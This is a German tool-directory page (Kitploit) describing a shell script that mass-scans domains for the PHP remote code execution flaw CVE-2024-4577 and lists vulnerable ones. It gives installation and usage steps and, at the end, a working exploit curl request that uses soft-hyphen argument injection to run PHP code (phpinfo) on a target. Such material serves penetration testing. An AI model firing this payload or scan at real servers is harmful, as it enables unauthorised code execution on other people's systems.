Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-4577 — Shell-Skript zum Scannen von Domänen auf die CVE-2024-4577 PHP Remote-Code-Ausführungs-Sicherheitslücke über manipulierte POST-Anfragen, das verwundbare Ziele zur manuellen Überprüfung exportiert. | Kitploit
Tools/GitHubGitHub/graphite-org/cve-2024-4577
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstests
GitHubgraphite-org/cve-2024-4577

CVE-2024-4577

Shell-Skript zum Scannen von Domänen auf die CVE-2024-4577 PHP Remote-Code-Ausführungs-Sicherheitslücke über manipulierte POST-Anfragen, das verwundbare Ziele zur manuellen Überprüfung exportiert.

Repository anzeigen
2vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-4577 Sicherheitslücken-Prüfer

Dieses Skript dient zur Überprüfung auf die Sicherheitslücke CVE-2024-4577, die durch die Ausnutzung bestimmter PHP-Konfigurationen die Ausführung von beliebigem Code aus der Ferne ermöglicht. Es sendet eine POST-Anfrage an bestimmte Endpunkte einer Liste von Domains und prüft, ob die Antwort auf eine Verwundbarkeit hindeutet.

Verwendung

  1. GNU Parallel installieren:

    root@kitploit:~
    sudo apt-get install parallel
    
  2. Repository klonen: Klonen Sie dieses Repository mit Git auf Ihren lokalen Rechner:

    root@kitploit:~
    git clone https://github.com/Yukiioz/CVE-2024-4577.git
    
  3. In das Repository navigieren: Wechseln Sie in das geklonte Verzeichnis:

    root@kitploit:~
    cd CVE-2024-4577
    
  4. Domain-Liste vorbereiten: Erstellen Sie eine Textdatei mit einer Liste der zu überprüfenden Domains. Jede Domain sollte in einer neuen Zeile stehen. Beispiel:

    root@kitploit:~
    https://example1.com
    https://example2.com
    https://example3.com
    
  5. Skript ausführen: Führen Sie das Skript CVE-2024-4577.sh aus und übergeben Sie den Pfad zur Domain-Liste als Argument:

    root@kitploit:~
    ./CVE-2024-4577.sh live-subdomains.txt | tee script.log
    
  6. Ausgabe überprüfen: Das Skript zeigt Fortschrittsinformationen an, während es jede Domain prüft. Wenn eine Domain als verwundbar erkannt wird, wird sie rot hervorgehoben. Das Skript exportiert außerdem eine Liste der verwundbaren Domains in eine Datei namens vulnerable_domains.txt.

Exportierte Datei: vulnerable_domains.txt

Das Skript exportiert eine Liste der verwundbaren Domains in eine Datei mit dem Namen vulnerable_domains.txt. Diese Datei enthält eine einfache Liste der verwundbaren Domains, jede Domain in einer neuen Zeile. Zur manuellen Bestätigung senden Sie mit dem curl-Befehl eine POST-Anfrage an den Ziel-Endpunkt auf der Domain. Ersetzen Sie https://dev.example.com/test.php durch den tatsächlichen Endpunkt auf der Ziel-Domain.

root@kitploit:~
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
     -H "User-Agent: curl/8.3.0" \
     --data "<?php phpinfo(); ?>"
Tool herunterladen